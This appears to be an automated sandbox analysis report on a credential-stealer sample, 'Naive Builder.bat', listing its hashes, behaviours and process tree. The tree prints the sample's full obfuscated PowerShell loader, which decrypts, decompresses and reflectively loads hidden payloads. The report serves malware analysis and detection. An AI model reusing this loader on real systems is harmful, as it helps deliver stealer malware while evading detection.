Analysis
-
max time kernel
122s -
max time network
123s -
platform
windows7_x64 -
resource
win7-20241023-en -
resource tags
arch:x64arch:x86image:win7-20241023-enlocale:en-usos:windows7-x64system -
submitted
04-12-2024 09:39
Static task
static1
Behavioral task
behavioral1
Sample
naive-stealer-main/Naive Builder.bat
Resource
win7-20241023-en
Behavioral task
behavioral2
Sample
naive-stealer-main/Naive Builder.bat
Resource
win10v2004-20241007-en
General
-
Target
naive-stealer-main/Naive Builder.bat
-
Size
12.8MB
-
MD5
a2e3e4286e8b22b3b021a6706b899dd7
-
SHA1
e6179204735421c3927f27c13f9751af1dce9bd2
-
SHA256
efd80dd8487437f58413be6e7d2da6ea866ae7626b3225dbf326e8c82c85e580
-
SHA512
3ff5d19accd1fa6765ffc3554bb9cfe3989eee4cf226c2ce7abbaff47a1586253ab1b408f4f9e47611ea7d2415f3298b12dfada1d1987d43c2efa16aac11e3e8
-
SSDEEP
49152:JZHKpAhg6/Ri76PuM0gcqQP+GBRa1SgA+754EU1kOeTUliFDvnrNqjdsusoj8nNc:e
Malware Config
Signatures
-
Executes dropped EXE 1 IoCs
Processes:
Naive Builder.bat.exepid Process 2304 Naive Builder.bat.exe -
Loads dropped DLL 1 IoCs
Processes:
cmd.exepid Process 1040 cmd.exe -
Drops file in Windows directory 2 IoCs
Processes:
cmd.exedescription ioc Process File created C:\Windows\$sxr-seroxen2\$sxr-Uni.bat cmd.exe File opened for modification C:\Windows\$sxr-seroxen2\$sxr-Uni.bat cmd.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
Processes:
Naive Builder.bat.exepid Process 2304 Naive Builder.bat.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
Naive Builder.bat.exedescription pid Process Token: SeDebugPrivilege 2304 Naive Builder.bat.exe -
Suspicious use of WriteProcessMemory 9 IoCs
Processes:
cmd.exenet.exedescription pid Process procid_target PID 1040 wrote to memory of 2336 1040 cmd.exe 31 PID 1040 wrote to memory of 2336 1040 cmd.exe 31 PID 1040 wrote to memory of 2336 1040 cmd.exe 31 PID 2336 wrote to memory of 2028 2336 net.exe 32 PID 2336 wrote to memory of 2028 2336 net.exe 32 PID 2336 wrote to memory of 2028 2336 net.exe 32 PID 1040 wrote to memory of 2304 1040 cmd.exe 34 PID 1040 wrote to memory of 2304 1040 cmd.exe 34 PID 1040 wrote to memory of 2304 1040 cmd.exe 34
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\naive-stealer-main\Naive Builder.bat"1⤵
- Loads dropped DLL
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
PID:1040 -
C:\Windows\system32\net.exenet session2⤵
- Suspicious use of WriteProcessMemory
PID:2336 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 session3⤵PID:2028
-
-
-
C:\Users\Admin\AppData\Local\Temp\naive-stealer-main\Naive Builder.bat.exe"Naive Builder.bat.exe" -noprofile -windowstyle hidden -ep bypass -command function mJkVt($luVLu){ $XURkq=[System.Security.Cryptography.Aes]::Create(); $XURkq.Mode=[System.Security.Cryptography.CipherMode]::CBC; $XURkq.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $XURkq.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('EJfVxric5nYI0sCifeM7QtCynXluiHdjC3MMcb2UUrA='); $XURkq.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('IIC8RBkY6uF/2e5D1cUgfg=='); $XhpAT=$XURkq.CreateDecryptor(); $return_var=$XhpAT.TransformFinalBlock($luVLu, 0, $luVLu.Length); $XhpAT.Dispose(); $XURkq.Dispose(); $return_var;}function hLEOv($luVLu){ $SBbXV=New-Object System.IO.MemoryStream(,$luVLu); $RlXKT=New-Object System.IO.MemoryStream; $XPinw=New-Object System.IO.Compression.GZipStream($SBbXV, [IO.Compression.CompressionMode]::Decompress); $XPinw.CopyTo($RlXKT); $XPinw.Dispose(); $SBbXV.Dispose(); $RlXKT.Dispose(); $RlXKT.ToArray();}function tzqfR($luVLu,$MCcIJ){ $VEHZu=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$luVLu); $cUkGe=$VEHZu.EntryPoint; $cUkGe.Invoke($null, $MCcIJ);}$flgbs=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\naive-stealer-main\Naive Builder.bat').Split([Environment]::NewLine);foreach ($zFvRn in $flgbs) { if ($zFvRn.StartsWith(':: ')) { $TRCCB=$zFvRn.Substring(4); break; }}$YrvSK=[string[]]$TRCCB.Split('\');$xplph=hLEOv (mJkVt ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($YrvSK[0])));$vNzEy=hLEOv (mJkVt ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($YrvSK[1])));tzqfR $vNzEy (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));tzqfR $xplph (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2304
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
462KB
MD5852d67a27e454bd389fa7f02a8cbe23f
SHA15330fedad485e0e4c23b2abe1075a1f984fde9fc
SHA256a8fdba9df15e41b6f5c69c79f66a26a9d48e174f9e7018a371600b866867dab8
SHA512327dc74590f34185735502e289135491092a453f7f1c5ee9e588032ff68934056ffa797f28181267fd9670f7895e1350894b16ea7b0e34a190597f14aea09a4d